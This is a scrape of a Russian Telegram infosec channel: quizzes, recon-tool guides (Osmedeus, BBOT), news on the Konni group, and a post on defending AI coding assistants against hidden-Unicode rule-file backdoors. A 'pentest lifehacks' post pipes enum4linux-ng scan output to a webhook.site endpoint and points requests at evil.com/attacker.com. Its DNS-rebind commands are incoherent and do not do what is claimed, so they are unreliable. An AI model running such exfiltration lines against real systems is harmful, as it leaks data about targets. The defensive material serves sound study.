Какой признак может указывать на lateral movement в Windows-домене?
Anonymous Quiz
11%
Повторные ошибки входа
52%
Использование wmic, psexec, smbexec между хостами
23%
Повышение привилегий в одном процессе
14%
Подозрительный DNS-запрос
❤5🤨5
Pentest, Red Team и Bug Bounty: в чем разница?
👋
⏺ Pentest - это такой контролируемый взлом. Команда проверяет конкретные системы по заранее согласованному плану: ищет уязвимости, доказывает возможность их эксплуатации и даёт отчёт. Нужно для оценки уровня защиты и соблюдения комплаенса.
⏺ Red Team - симуляция реального нападения. Тут уже цель не просто найти дыру, а проверить, как компания обнаружит и отреагирует на атаку. Используются социальная инженерия, фишинг, обход SOC. Можно сказать, что здесь уже все реалистичнее, только без ущерба, ясное дело.
⏺ Bug Bounty - прямо открытая охота. Компания публикует правила, и исследователи со всего мира ищут уязвимости за вознаграждение. Чем шире охват - тем больше и шанс найти то, что не заметили даже опытные тестеры.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!Вспомним, чем отличаются эти три формата тестирования.ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍4
А кто у вас отвечает за kube-api? Безопасность Kubernetes при помощи CIS Benchmark
Каждый кластер Kubernetes - буквально живой организм: он управляет сервисами, хранит состояние и следит за апками. Но один неверный флаг в kube-apiserver или слабые права на etcd могут превратить его в дыру для данных и процессов.
⏺ В статье разобрали, как CIS Benchmark помогает закрыть очевидные уязвимости, какие настройки мастера и etcd стоит мониторить, и на что обратить внимание, чтобы кластер работал на 💯
ZeroDay | #Статья
Каждый кластер Kubernetes - буквально живой организм: он управляет сервисами, хранит состояние и следит за апками. Но один неверный флаг в kube-apiserver или слабые права на etcd могут превратить его в дыру для данных и процессов.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍1💩1
Что наиболее эффективно уменьшит риск Pass‑the‑Hash в домене Windows?
Anonymous Quiz
4%
Оставить NTLM и не менять настройки
87%
Включить Credential Guard / LSA Protection и уменьшить распространение привилегий
2%
Позволить всем пользователям админские права
7%
Отключить Kerberos
❤4
Osmedeus: автоматизируем рекон
👋
⏺ Osmedeus - workflow‑движок для рекона: собирает подписи, пробегает словари, складывает результаты и масштабируется на аж сотню целей. Идея простая - не выполнять по 100 скриптов вручную.
⏺ Супер легко кастомить и масштабировать: свои воркфлоу, свои wordlists, режимы «gentle/aggressive», бэкапы воркспейсов и cron‑запуски.
⏺ Для начала установим:
Простой скан (general flow)
⏺ Исключить модули (например, скриншоты и spider)
Запуск конкретного модуля (content discovery из файла с URL)
⏺ Настройка скорости, потоков и чанков
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.
# автоматическая install-скрипт
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)
# или сборка из исходников (Go >=1.17)
go install -v github.com/j3ssie/osmedeus@latest
Простой скан (general flow)
osmedeus scan -t sample.com
osmedeus scan -t sample.com -x screenshot -x spider
Запуск конкретного модуля (content discovery из файла с URL)
osmedeus scan -m content-discovery -t http-file.txt
osmedeus scan --tactic gently -t sample.com
osmedeus scan --threads-hold=15 -f cidr -t 1.2.3.4/24
osmedeus scan --chunk --chunk-parts 20 -f cidr -t list-of-100-cidr.txt
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤3👏3
Корейские хакеры удаленно стирали данные с помощью Google Find Hub
👋
⏺ Что это было: группа Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, Vedalia) рассылала вредоносное ПО под видом приложений для снятия стресса. С помощью фишинговых писем и компрометации ПК они крали учётные данные Google жертв, а затем через Find Hub инициировали удалённую очистку устройств.
⏺ Как это было: заражённый ПК оставался под наблюдением более года. Группировка использовала Lilith RAT и EndRAT для шпионажа, управления системой и кражи данных из Google и Naver. Автоматизированные скрипты запускались каждую минуту, выполняя команды на заражённых машинах - от скачивания и загрузки файлов до удаления данных.
⏺ Последствия - печальны: люди потеряли личные данные без возможности восстановить их. Хакеры также чистили почту, удаляли уведомления Google и подчищали следы активности, чтобы скрыть свои действия.
⏺ Konni использовали Remcos RAT, Quasar RAT и RftRAT, а атаки были ориентированы на корейских пользователей. Google отметил, что уязвимостей в Android или Find Hub не было - атака требовала компрометации ПК и кражи учётных данных.
ZeroDay | #история
Приветствую в мире цифровой безопасности!Расскажу, как северокорейская группа Konni использовала обычные функции Google, чтобы красть данные и удалять их с устройств жертв.ZeroDay | #история
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤3👍3😱2
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ XSS в заголовки через Referer + webhook-лог: проходит через CSP, фиксирует кражу куки/токена без JS.
⏺ Однострочный SMB-скан с enum4linux-ng + webhook-результат: Быстро собирает шары/юзеров, отправляет на webhook.
➡️ Защита: фильтровать Referer, отключить NTLM где не нужно, мониторить 445/tcp.
⏺ DNS-rebind через короткое TTL + webhook-ping: обходит локальные ограничения, подтверждает доступ к internal.
➡️ Защищаемся так: DNS с анти-rebind, проверка Host заголовка, запрет external DNS в internal.
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте.GET /page HTTP/1.1
Host: target.example.com
Referer: https://evil.com/?xss=
enum4linux-ng -A target.example.com | curl -s -X POST https://webhook.site/your-id --data-binary @-
echo "127.0.0.1 target.internal" > /tmp/rebind
curl -s --resolve attacker.com:80:127.0.0.1 https://webhook.site/your-id -d "rebind_success=$(date)"
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤7👍2👏1
Двойное шифрование секретов: когда и зачем нужно?
👋
⏺ Секреты - это пароли, токены и ключи. Если хранить их как попало, они легко «утекут». В приложениях всё сложнее: вы не знаете, кто может видеть память программы и могут ли данные перехватить. Идея по сути простая: минимально держать секрет в памяти - получил, использовал и удалил. Так снижается шанс утечки через дампы памяти, снапшоты ВМ или трейсы упавших приложений.
⏺ Проблема хранилищ секретов: Даже продвинутые СХС шифруют данные, но ключ для расшифровки хранится в памяти процесса. На «железе» это относительно безопасно, но в виртуализации можно незаметно сделать снапшот и получить доступ к секрету и ключу, а значит - расшифровать всё. А если ВМ много, то уследить сложно.
⏺ Двойное шифрование, в чем разница: дополнительный слой шифрования. Например, в HashiCorp Vault или Deckhouse Stronghold EE:
➡️ Данные шифруются AES в Storage.
➡️ Ключ key для расшифровки хранится в памяти процесса.
➡️ Снэпшот ВМ → секрет + ключ → всё расшифровано.
⏺ С HSM (seal wrap) ситуация уже меняется:
• Данные шифруются ещё одним ключом, который нельзя извлечь.
• Даже если key утёк, данные в безопасности.
• Cache можно отключить, чтобы минимизировать риск через снапшоты.
⏺ Когда HSM нет: Используем транзитное шифрование: ключ хранится на другой ВМ или в другом дата-центре. Чтобы расшифровать данные, хакеру нужен синхронный снапшот двух ВМ, что почти невозможно.
Делаем вторую часть?
ZeroDay | #шифрование
Приветствую в мире цифровой безопасности!Сегодня расскажу, как повысить защиту секретов приложений и почему одного шифрования часто недостаточно.• Данные шифруются ещё одним ключом, который нельзя извлечь.
• Даже если key утёк, данные в безопасности.
• Cache можно отключить, чтобы минимизировать риск через снапшоты.
Делаем вторую часть?
ZeroDay | #шифрование
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24✍2🤔2❤1
Какой признак часто указывает на эксплуатацию blind SQL injection, несмотря на отсутствие ошибок и вывода?
Anonymous Quiz
18%
Увеличенное количество UDP-пакетов
57%
Повышение латентности ответа при использовании time‑based payload’ов (SLEEP(5))
17%
Рост CPU на базе данных
8%
Обрыв HTTPS‑сессий
😭10👍2🔥1
Как устроена цензура изнутри: взгляд на китайский фаервол TSG-X
Подробно разобрали 500 Гб утечек с оборудования провайдеров Китая, чтобы показать, как страна контролирует интернет. VPN, Tor, необычные потоки данных - всё проходит через «чёрную коробку» TSG-X, которая фильтрует, блокирует и помечает трафик, часто без прямого понимания, что именно блокируется.
⏺ В статье рассматривают цепочки правил, принципов DPI и управления обновлениями, а также того, как система умеет выявлять новые сервисы и потенциально ограничивать доступ пользователей, ещё до того, как они что-то сделают.
ZeroDay | #Статья
Подробно разобрали 500 Гб утечек с оборудования провайдеров Китая, чтобы показать, как страна контролирует интернет. VPN, Tor, необычные потоки данных - всё проходит через «чёрную коробку» TSG-X, которая фильтрует, блокирует и помечает трафик, часто без прямого понимания, что именно блокируется.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20❤4👾3❤🔥1🔥1
Rules File Backdoor: как защититься и почему это должно быть у вас в регламенте
👋
⏺ Недоверие к конфигам - основа всего: Файлы с правилами для модели должны проходить тот же контроль, что и код. Конфиг давно перестал быть «простым текстом» - это полноправный вектор атаки, который нужно ревьюить, хэшировать и проверять источник.
⏺ Делайте невидимое видимым: Zero-width, control-chars и странный Unicode обязаны подсвечиваться автоматикой. В CI/CD добавляются:
➡️ проверка на zero-width (U+200B–U+206F),
➡️ diff нормализованных Unicode-форм,
➡️ линтер скрытых символов.
Один U+202E способен менять логику сильнее, чем вставка кода.
⏺ Прерывайте цепочку заражения: Никаких «удобных rules.md» из gist’ов, форумов, чатов, npm-пакетов и рандомных GitHub-реп. Если автор неизвестен - конфиг считается вредоносным по умолчанию. Половина инцидентов начинается с копипасты.
⏺ Песочница для ассистента - мастхэв: AI не должен напрямую видеть сеть, файловую систему, переменные окружения и токены. Ограничения контейнера + proxy-песочница = минимизация последствий даже при заражённом rules-файле.
⏺ Отслеживайте поведение модели, а не только файлы: Необычные API-вызовы, лишние колбэки, попытки «запомнить» лишнее или вмешаться в код - это уже прямо сигнал. Для атак на правила нужен отдельный класс логов и алертов.
ZeroDay | #атака
Приветствую в мире цифровой безопасности!Продолжаем разбирать одну из самых неприятных атак на AI-ассистентов - подмену правил. Сейчас поговорим о защите.Один U+202E способен менять логику сильнее, чем вставка кода.
ZeroDay | #атака
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4❤3🔥2❤🔥1
BBOT: автоматизируем разведку по-взрослому
👋
⏺ BBOT - рекурсивный интернет-сканер: собирает поддомены, проходит веб, вытягивает почты, параметры, делает скриншоты и расширяет площадь атаки почти без участия человека. Суть тут в том, что один запуск, и десятки цепочек внутри.
⏺ Как вообще работает: BBOT комбинирует пассивные источники, активный брут, NLP-мутации поддоменов и веб-скан. Нашёл новую точку - уходит глубже. В итоге цепочка получается похожа на мини-Spiderfoot, но быстрее и адаптивнее.
⏺ Установка:
⏺ Простой поддоменный скан:
⏺ Паук (emails, ресурсы, параметры):
⏺ Email-enum:
⏺ Максимальный прогон - всё сразу:
ZeroDay | #Инструмент
👋
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.
pipx install bbot
bbot -t evilcorp.com -p subdomain-enum
bbot -t evilcorp.com -p spider
bbot -t evilcorp.com -p email-enum
bbot -t evilcorp.com -p kitchen-sink --allow-deadly
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤2
Golden SAML позволяет атакующему…
Anonymous Quiz
21%
Выполнять пассивный перехват SAML-ассершнов без изменения трафика
46%
Генерировать валидные SAML-ассершны без доступа к сервисам федерации
7%
Подменять метаданные IdP прямо в браузере жертвы
26%
Перехватывать Kerberos-тикеты и конвертировать их в SAML-токены
This media is not supported in your browser
VIEW IN TELEGRAM
Приветствую в мире цифровой безопасности!
Сделал для вас новую подборку крутых бесплатных курсов по ИБ и не только на YouTube.
ZeroDay | #Подборка
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍3
На AI Journey назвали три стратегических направления развития ИИ в кибербезопасности
👋 Приветствую в мире цифровой безопасности!
Поговорим о выступлении президента кибербеза Сбера Сергея Лебедя на международной конференции AI Journey. Он уверен, что современная кибербезопасность невозможна без использования искусственного интеллекта — это подтверждает опыт практически всех мировых лидеров.
⏺ Первое направление ― автоматизация реагирования. Вы никогда не узнаете, насколько хорошо вы защищены, пока вас не атакуют или пока вы не научитесь моделировать риск-события и на основе полученных данных совершенствовать защиту. Разумеется, для Сбера приемлем только второй вариант. Поэтому в банке активно разрабатываются мультиагентные системы на основе ИИ.
⏺ Второе – это автоматизированная безопасная разработка. Разработка без учетов киберрисков в современных реалиях, это все равно что прогулка по канату над пропастью с завязанными глазами ― шансы на положительный результат практически равны нулю.
⏺ Третье направление ― ассистенты и копайлоты на основе ИИ. Эти системы компенсируют недостаток знаний экспертов, недостаточную скорость получения и обработки ими данных, или и то, и другое.
ZeroDay | #безопасность
Поговорим о выступлении президента кибербеза Сбера Сергея Лебедя на международной конференции AI Journey. Он уверен, что современная кибербезопасность невозможна без использования искусственного интеллекта — это подтверждает опыт практически всех мировых лидеров.
ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👏9❤3🔥2
Какой метод защиты от переполнения буфера предотвращает выполнение произвольного кода, запрещая выполнение данных в определенных областях памяти?
Anonymous Quiz
31%
ASLR
29%
DEP
26%
Sandbox
14%
WAF
😢16🔥4❤2👍2